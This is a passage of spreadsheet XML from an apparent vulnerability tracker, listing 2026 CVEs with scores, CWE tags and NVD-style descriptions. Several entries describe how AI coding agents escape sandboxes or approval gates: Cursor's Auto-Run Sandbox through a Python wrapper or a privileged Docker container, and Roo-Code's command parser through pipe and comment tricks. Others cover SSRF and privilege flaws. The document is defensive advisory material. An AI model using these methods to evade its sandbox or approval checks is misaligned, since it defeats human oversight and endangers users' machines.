          <t>Cursor is a code editor built for programming with AI. Prior to 3.1.2, Cursor IDE for macOS allows an agent running in Auto-Run Sandbox mode to replace a virtual environment's Python executable with a malicious wrapper that the Microsoft Python extension invokes outside the sandbox, allowing arbitrary host commands with the user's privileges, including modifying files outside the workspace and launching applications. This issue is fixed in version 3.1.2.</t>
        </is>
      </c>
      <c r="M2402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73217</t>
        </is>
      </c>
    </row>
    <row r="2403">
      <c r="A2403" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73218</t>
        </is>
      </c>
      <c r="C2403" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2403" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2403" s="5" t="inlineStr"/>
      <c r="F2403" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2403" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H2403" s="5" t="inlineStr"/>
      <c r="I2403" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2403" s="5" t="inlineStr"/>
      <c r="K2403" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L2403" s="5" t="inlineStr">
        <is>
          <t>Cursor is a code editor built for programming with AI. Prior to 3.0.0, Cursor IDE for macOS allows an agent running in Auto-Run Sandbox mode, when Docker Desktop and the Dev Containers CLI are installed, to launch a privileged container and mount Docker's virtiofs0, granting read and write access to the user's home directory and enabling host command execution with the user's privileges without an additional permission prompt. This issue is fixed in version 3.0.0.</t>
        </is>
      </c>
      <c r="M2403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73218</t>
        </is>
      </c>
    </row>
    <row r="2404">
      <c r="A2404" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73267</t>
        </is>
      </c>
      <c r="C2404" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2404" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2404" s="5" t="inlineStr"/>
      <c r="F2404" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2404" s="5" t="inlineStr"/>
      <c r="H2404" s="5" t="inlineStr"/>
      <c r="I2404" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2404" s="5" t="inlineStr"/>
      <c r="K2404" s="5" t="inlineStr">
        <is>
          <t>CWE-602</t>
        </is>
      </c>
      <c r="L2404" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the clusterclaims-controller component of multicluster engine (MCE). A tenant with standard permissions to create and delete ClusterClaim resources can exploit this by manipulating the `spec.namespace` field. This allows the tenant to specify and delete any ManagedCluster, including the hub's local-cluster or other tenants' clusters, due to a missing ownership check. This vulnerability can lead to a denial of service by enabling unauthorized deletion of ManagedClusters.</t>
        </is>
      </c>
      <c r="M2404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73267</t>
        </is>
      </c>
    </row>
    <row r="2405">
      <c r="A2405" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73315</t>
        </is>
      </c>
      <c r="C2405" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2405" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2405" s="5" t="inlineStr"/>
      <c r="F2405" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2405" s="5" t="inlineStr"/>
      <c r="H2405" s="5" t="inlineStr"/>
      <c r="I2405" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2405" s="5" t="inlineStr"/>
      <c r="K2405" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2405" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a server-side request forgery vulnerability in the PayPal REST webhook handler that allows unauthenticated attackers to cause the server to make outbound HTTP requests to arbitrary destinations by supplying a crafted certificate URL in webhook headers without scheme, hostname, or allowlist validation. Attackers can submit a crafted POST to the PayPal webhook callback endpoint to reach internal network resources including cloud instance metadata services, potentially disclosing IAM credentials or enabling secondary internal service exploitation.</t>
        </is>
      </c>
      <c r="M2405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73315</t>
        </is>
      </c>
    </row>
    <row r="2406">
      <c r="A2406" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73626</t>
        </is>
      </c>
      <c r="C2406" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2406" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2406" s="5" t="inlineStr"/>
      <c r="F2406" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2406" s="5" t="inlineStr"/>
      <c r="H2406" s="5" t="inlineStr"/>
      <c r="I2406" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2406" s="5" t="inlineStr"/>
      <c r="K2406" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L2406" s="5" t="inlineStr">
        <is>
          <t>JupyterLab versions &gt;=4.6.0,&lt;=4.6.1 and &lt;=4.5.9 contain an allowlist/blocklist enforcement gap in PyPIExtensionManager.install(). A missing 'await' caused the is_install_allowed coroutine to never execute, so the extension allowlist/blocklist check was not enforced for direct callers of install(). The stock JupyterLab HTTP API and Extension Manager UI are not affected, as they perform a separate, correctly awaited check. The issue affects only deployments where a custom extension or downstream integration imports PyPIExtensionManager and calls install() directly with a package name influenced by untrusted input, an allowlist/blocklist is configured, the PyPI Extension Manager is enabled, and kernels and terminals are disabled or delegated to remote hosts. Fixed in JupyterLab 4.6.2 and 4.5.10.</t>
        </is>
      </c>
      <c r="M2406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73626</t>
        </is>
      </c>
    </row>
    <row r="2407">
      <c r="A2407" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75033</t>
        </is>
      </c>
      <c r="C2407" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2407" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2407" s="5" t="inlineStr"/>
      <c r="F2407" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2407" s="5" t="inlineStr"/>
      <c r="H2407" s="5" t="inlineStr"/>
      <c r="I2407" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2407" s="5" t="inlineStr"/>
      <c r="K2407" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2407" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Rancher Manager. Project Secrets were propagated into a namespace based only on its `field.cattle.io/projectId` annotation, without verifying that the referenced project belonged to the same downstream cluster. A user able to create namespaces on one cluster could set the annotation to a project ID from another cluster and have that project's secrets copied into a namespace under their control.
This issue affects Rancher: before 2.15.1.</t>
        </is>
      </c>
      <c r="M2407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75033</t>
        </is>
      </c>
    </row>
    <row r="2408">
      <c r="A2408" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75569</t>
        </is>
      </c>
      <c r="C2408" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2408" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2408" s="5" t="inlineStr"/>
      <c r="F2408" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2408" s="5" t="inlineStr"/>
      <c r="H2408" s="5" t="inlineStr"/>
      <c r="I2408" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2408" s="5" t="inlineStr"/>
      <c r="K2408" s="5" t="inlineStr">
        <is>
          <t>CWE-1357</t>
        </is>
      </c>
      <c r="L2408" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in mce-operator-bundle. The build process fetches and executes scripts from a remote repository without performing integrity checks, such as commit pinning or signature verification. This allows a malicious actor with write access to the remote repository to inject and execute arbitrary code during the build. The consequence is a compromised build process, potentially leading to the distribution of malicious software.</t>
        </is>
      </c>
      <c r="M2408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75569</t>
        </is>
      </c>
    </row>
    <row r="2409">
      <c r="A2409" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76640</t>
        </is>
      </c>
      <c r="C2409" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2409" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2409" s="5" t="inlineStr"/>
      <c r="F2409" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2409" s="5" t="inlineStr"/>
      <c r="H2409" s="5" t="inlineStr"/>
      <c r="I2409" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2409" s="5" t="inlineStr"/>
      <c r="K2409" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-787</t>
        </is>
      </c>
      <c r="L2409" s="5" t="inlineStr">
        <is>
          <t>Unitree G1 EDU firmware through 1.5.2 contains multiple chained vulnerabilities in the BLE GATT server and WiFi provisioning stack that allow unauthenticated proximate attackers to achieve root code execution without pairing or credentials by exploiting an unquoted heredoc variable in the WiFi provisioning script and a buffer overflow in the SSID chunk accumulator. Attackers can send crafted BLE writes to overflow a fixed BSS buffer across BLE connections, corrupting an adjacent mainloop function pointer dispatch entry that is subsequently invoked by the cleanup path passing attacker-controlled data to system() as uid 0.</t>
        </is>
      </c>
      <c r="M2409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76640</t>
        </is>
      </c>
    </row>
    <row r="2410">
      <c r="A2410" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76851</t>
        </is>
      </c>
      <c r="C2410" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2410" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2410" s="5" t="inlineStr"/>
      <c r="F2410" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2410" s="5" t="inlineStr"/>
      <c r="H2410" s="5" t="inlineStr">
        <is>
          <t>github:enterprise_server</t>
        </is>
      </c>
      <c r="I2410" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2410" s="5" t="inlineStr"/>
      <c r="K2410" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2410" s="5" t="inlineStr">
        <is>
          <t>A Server-Side Request Forgery (SSRF) vulnerability was identified in GitHub Enterprise Server that allowed remote code execution on the instance. Insufficient network isolation allowed malicious pre-receive hook code to impersonate an internal service and redirect trusted internal requests to a privileged service, leading to elevated code execution. Exploitation required pre-receive hook networking to be enabled and either site administrator privileges or write access to a repository containing a configured pre-receive hook. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.22 and was fixed in versions 3.17.20, 3.18.14, 3.19.11, 3.20.7, and 3.21.5. This vulnerability was reported via the GitHub Bug Bounty program.</t>
        </is>
      </c>
      <c r="M2410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76851</t>
        </is>
      </c>
    </row>
    <row r="2411">
      <c r="A2411" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77106</t>
        </is>
      </c>
      <c r="C2411" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2411" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2411" s="5" t="inlineStr"/>
      <c r="F2411" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2411" s="5" t="inlineStr"/>
      <c r="H2411" s="5" t="inlineStr"/>
      <c r="I2411" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2411" s="5" t="inlineStr"/>
      <c r="K2411" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2411" s="5" t="inlineStr">
        <is>
          <t>Cvlaunchd contained a missing authorization issue affecting command execution authorization. Software customers upgrade to resolved maintenance release. Update all Commvault installations, including Commserve, Webserver, Command Center, Media Agents, Clients and HyperScale X.</t>
        </is>
      </c>
      <c r="M2411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77106</t>
        </is>
      </c>
    </row>
    <row r="2412">
      <c r="A2412" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77646</t>
        </is>
      </c>
      <c r="C2412" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2412" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2412" s="5" t="inlineStr"/>
      <c r="F2412" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2412" s="5" t="inlineStr"/>
      <c r="H2412" s="5" t="inlineStr"/>
      <c r="I2412" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J2412" s="5" t="inlineStr"/>
      <c r="K2412" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-918</t>
        </is>
      </c>
      <c r="L2412" s="5" t="inlineStr">
        <is>
          <t>A Server-Side Request Forgery (SSRF) vulnerability has been reported in PTC Windchill PDMLink and PTC FlexPLM. The vulnerability may be exploited through the deserialization of untrusted data.</t>
        </is>
      </c>
      <c r="M2412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77646</t>
        </is>
      </c>
    </row>
    <row r="2413">
      <c r="A2413" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77775</t>
        </is>
      </c>
      <c r="C2413" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2413" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2413" s="5" t="inlineStr"/>
      <c r="F2413" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2413" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H2413" s="5" t="inlineStr"/>
      <c r="I2413" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2413" s="5" t="inlineStr"/>
      <c r="K2413" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2413" s="5" t="inlineStr">
        <is>
          <t>Headroom's LLM proxy lets a client choose the upstream destination with the x-headroom-base-url request header. _resolve_openai_upstream_base in headroom/proxy/handlers/openai.py accepts the header value, requires only that it parse with an http or https scheme and a hostname, and returns it for use as the upstream base; _select_passthrough_base_url in headroom/providers/proxy_routes.py reads the same header for the passthrough routes. No check rejects loopback, link-local, or RFC 1918 destinations, and because the component is a proxy the upstream response is returned to the caller, so the request reaches internal services and cloud metadata addresses and their responses are disclosed. The Authorization header accompanying the request is forwarded unchanged to the caller-designated host. The pip console script binds 127.0.0.1 by default, but the reference docker-compose.yml ships --host 0.0.0.0 with published ports and no required HEADROOM_PROXY_TOKEN, which the server itself warns about at startup, so a deployment following the shipped compose exposes the affected data-plane routes to the network without authentication.</t>
        </is>
      </c>
      <c r="M2413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77775</t>
        </is>
      </c>
    </row>
    <row r="2414">
      <c r="A2414" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77909</t>
        </is>
      </c>
      <c r="C2414" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2414" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2414" s="5" t="inlineStr"/>
      <c r="F2414" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2414" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H2414" s="5" t="inlineStr"/>
      <c r="I2414" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2414" s="5" t="inlineStr"/>
      <c r="K2414" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L2414" s="5" t="inlineStr">
        <is>
          <t>Insufficiently protected credentials in Azure CycleCloud allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77909</t>
        </is>
      </c>
    </row>
    <row r="2415">
      <c r="A2415" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78623</t>
        </is>
      </c>
      <c r="C2415" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2415" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2415" s="5" t="inlineStr"/>
      <c r="F2415" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2415" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H2415" s="5" t="inlineStr"/>
      <c r="I2415" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2415" s="5" t="inlineStr"/>
      <c r="K2415" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2415" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M2415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78623</t>
        </is>
      </c>
    </row>
    <row r="2416">
      <c r="A2416" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79637</t>
        </is>
      </c>
      <c r="C2416" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2416" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2416" s="5" t="inlineStr"/>
      <c r="F2416" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2416" s="5" t="inlineStr"/>
      <c r="H2416" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2416" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2416" s="5" t="inlineStr"/>
      <c r="K2416" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2416"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2416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79637</t>
        </is>
      </c>
    </row>
    <row r="2417">
      <c r="A2417" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79750</t>
        </is>
      </c>
      <c r="C2417" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2417" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2417" s="5" t="inlineStr"/>
      <c r="F2417" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2417" s="5" t="inlineStr"/>
      <c r="H2417" s="5" t="inlineStr"/>
      <c r="I2417" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2417" s="5" t="inlineStr"/>
      <c r="K2417" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2417" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 1.0.30, MCPHub scopes non-admin users to servers they own (list views and config edits enforce ownership), but the tool-execution API does not. Any authenticated non-admin user can invoke tools on MCP servers owned by other users — servers they cannot even see in GET /api/servers. Because connected MCP servers carry real capability (filesystem, HTTP fetch, cloud APIs with the owner's keys), this is cross-tenant compromise: demonstrated arbitrary host file read (/etc/passwd, another user's secrets) and SSRF. This issue has been patched in version 1.0.30.</t>
        </is>
      </c>
      <c r="M2417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79750</t>
        </is>
      </c>
    </row>
    <row r="2418">
      <c r="A2418" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80134</t>
        </is>
      </c>
      <c r="C2418" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2418" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2418" s="5" t="inlineStr"/>
      <c r="F2418" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2418" s="5" t="inlineStr"/>
      <c r="H2418" s="5" t="inlineStr"/>
      <c r="I2418" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2418" s="5" t="inlineStr"/>
      <c r="K2418" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L2418" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Use of Hard-coded Credentials vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="M2418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80134</t>
        </is>
      </c>
    </row>
    <row r="2419">
      <c r="A2419" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81210</t>
        </is>
      </c>
      <c r="C2419" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2419" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2419" s="5" t="inlineStr"/>
      <c r="F2419" s="5" t="inlineStr"/>
      <c r="G2419" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2419" s="5" t="inlineStr"/>
      <c r="I2419" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2419" s="5" t="inlineStr"/>
      <c r="K2419" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2419"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M2419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81210</t>
        </is>
      </c>
    </row>
    <row r="2420">
      <c r="A2420" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81832</t>
        </is>
      </c>
      <c r="C2420" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2420" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2420" s="5" t="inlineStr"/>
      <c r="F2420" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2420" s="5" t="inlineStr">
        <is>
          <t>ibm, sap</t>
        </is>
      </c>
      <c r="H2420" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="I2420" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2420" s="5" t="inlineStr"/>
      <c r="K2420" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L2420" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 SAP Adapter is vulnerable to an XML external entity (XXE) attack.</t>
        </is>
      </c>
      <c r="M2420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81832</t>
        </is>
      </c>
    </row>
    <row r="2421">
      <c r="A2421" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82536</t>
        </is>
      </c>
      <c r="C2421" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2421" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2421" s="5" t="inlineStr"/>
      <c r="F2421" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2421" s="5" t="inlineStr"/>
      <c r="H2421" s="5" t="inlineStr"/>
      <c r="I2421" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2421" s="5" t="inlineStr"/>
      <c r="K2421" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L2421" s="5" t="inlineStr">
        <is>
          <t>Roo-Code through 3.54.0 contains an auto-approve bypass vulnerability in the shell command parsing logic that allows attackers to execute denied shell commands by exploiting the omission of the bash pipe operator from the command parser's operator token set. Attackers can craft a command line with an allowlisted prefix followed by the stderr-redirecting pipe operator and a denied command, causing the parser to approve the full pipeline while bash executes the denied component with the agent's auto-execute privileges on the developer's machine.</t>
        </is>
      </c>
      <c r="M2421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82536</t>
        </is>
      </c>
    </row>
    <row r="2422">
      <c r="A2422" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82537</t>
        </is>
      </c>
      <c r="C2422" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2422" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2422" s="5" t="inlineStr"/>
      <c r="F2422" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2422" s="5" t="inlineStr"/>
      <c r="H2422" s="5" t="inlineStr"/>
      <c r="I2422" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2422" s="5" t="inlineStr"/>
      <c r="K2422" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="L2422" s="5" t="inlineStr">
        <is>
          <t>Roo-Code through 3.54.0 contains an auto-approve bypass vulnerability that allows attackers to execute denied shell commands by exploiting a word-boundary mismatch in comment handling between the approval gate's shell parser and bash. Attackers can craft a command string with an allowlisted word immediately followed by a hash character, separator, and denied command to pass the approval gate while bash executes the denied command with the agent's auto-execute privileges on the developer's machine.</t>
        </is>
      </c>
      <c r="M2422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82537</t>
        </is>
      </c>
    </row>
    <row r="2423">
      <c r="A2423" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84256</t>
        </is>
      </c>
      <c r="C2423" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2423" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2423" s="5" t="inlineStr"/>
      <c r="F2423" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2423" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2423" s="5" t="inlineStr"/>
      <c r="I2423" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2423" s="5" t="inlineStr"/>
      <c r="K2423" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-88</t>
        </is>
      </c>
      <c r="L2423" s="5" t="inlineStr">
        <is>
          <t>An argument parsing issue in OpenVPN 2.1_rc10 through 2.6.22 and 2.7_alpha1 through 2.7.6 on Windows allows remote authenticated users to execute arbitrary commands via a crafted certificate subject</t>
        </is>
